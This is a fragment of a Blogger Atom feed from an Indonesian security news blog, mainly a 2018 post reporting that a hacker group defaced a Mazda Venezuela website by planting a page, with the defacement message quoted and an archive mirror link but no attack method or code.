href='https://www.blogger.com/feeds/1481717144980864440/posts/default/5412869977973928177'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/linux-kernel-exploit-2017-proof-of.html' title='Linux Kernel Exploit 2017'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-fq9G5uZVeL8/W0SljGTDYwI/AAAAAAAAAEU/0NyZGYTNaw86FXEgaUa1ZxGnawAlkgjawCEwYBhgL/s72-c/CVE-2017-6074-470x260.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-2178633905121789840</id><published>2018-07-12T06:45:00.001-07:00</published><updated>2018-08-15T20:27:04.152-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Crime"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Technology"/><title type='text'>Official Website Madza Venezuela Diretas</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-eCYsA1mHJdM/W0cGAsgikaI/AAAAAAAAAHk/g89_F9QvX4wBwcnA5kCEOz3Cpu4Sxs8igCLcBGAs/s1600/Madza%2BHackd.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;500&quot; data-original-width=&quot;600&quot; height=&quot;266&quot; src=&quot;https://4.bp.blogspot.com/-eCYsA1mHJdM/W0cGAsgikaI/AAAAAAAAAHk/g89_F9QvX4wBwcnA5kCEOz3Cpu4Sxs8igCLcBGAs/s320/Madza%2BHackd.png&quot; width=&quot;320&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;SUICIDE-DB&amp;nbsp;  - Thursday, 12-07-2018. The new site Madza Mobile Venezuela hacked by  Indonesian Hackers , those who call themselves &lt;b&gt;Typical Idiot Security&lt;/b&gt; back in action, this time the official website of Madza Mobile  Venezuela became the target, this hacker managed to exploit the official  website Madza Venezuela located at &lt;b&gt;http://mazda.com.ve/free.html&lt;/b&gt;, this hacker does not change the look of the front page but instead entrust a file called free.html&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;which contains the message :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;hacked by typical idiot security &amp;lt;3&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;free prosox&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;whatever  the motive of this attack but in the message can be concluded that they  are friends or what I do not know, da in the message convey the message  &quot;free Prosox&quot;, yes who does not know the name of Prosox, he is a hacker  from francis attack the popular site youtube month then&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Here&#39;s how websites look after hacked:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-DDPu0iyySck/W0cHc8NUKNI/AAAAAAAAAHw/Uw2tCdFBVbQG3C6hBExSU5LmZRiHaXVTQCLcBGAs/s1600/Madza%2BVenezuela%2BHacked.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;272&quot; data-original-width=&quot;499&quot; height=&quot;217&quot; src=&quot;https://4.bp.blogspot.com/-DDPu0iyySck/W0cHc8NUKNI/AAAAAAAAAHw/Uw2tCdFBVbQG3C6hBExSU5LmZRiHaXVTQCLcBGAs/s400/Madza%2BVenezuela%2BHacked.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Mazda  Motor Corporation (マ ツ ダ 株式会社 Matsuda Kabushiki-gaisha) (TYO: 7261) is a  Japanese automotive company. The company was founded in 1920 and  headquartered in Hiroshima, Japan. The company employs 39,364 workers on  March 31, 2008. In 2007, Mazda produced 1.3 million cars worldwide.  Much of that production (nearly 1 million) is produced at its plant in  Japan, with the remainder at other plants around the world.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Until  this news is revealed there has been no improvement from related sites.  But the site is already being forwarded for archives or alerts that the  site has been hacked.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;You can see the Archive Mirror database of hackers at :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;http://www.zone-h.org/mirror/id/31455443&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;(Zaenal Arifin)&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/2178633905121789840/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/indonesian-hacker-hijack-official.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/2178633905121789840'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/2178633905121789840'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/indonesian-hacker-hijack-official.html' title='Official Website Madza Venezuela Diretas'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-eCYsA1mHJdM/W0cGAsgikaI/AAAAAAAAAHk/g89_F9QvX4wBwcnA5kCEOz3Cpu4Sxs8igCLcBGAs/s72-c/Madza%2BHackd.png" height="72" width="72"/><thr:total>0</thr:total></entry></feed>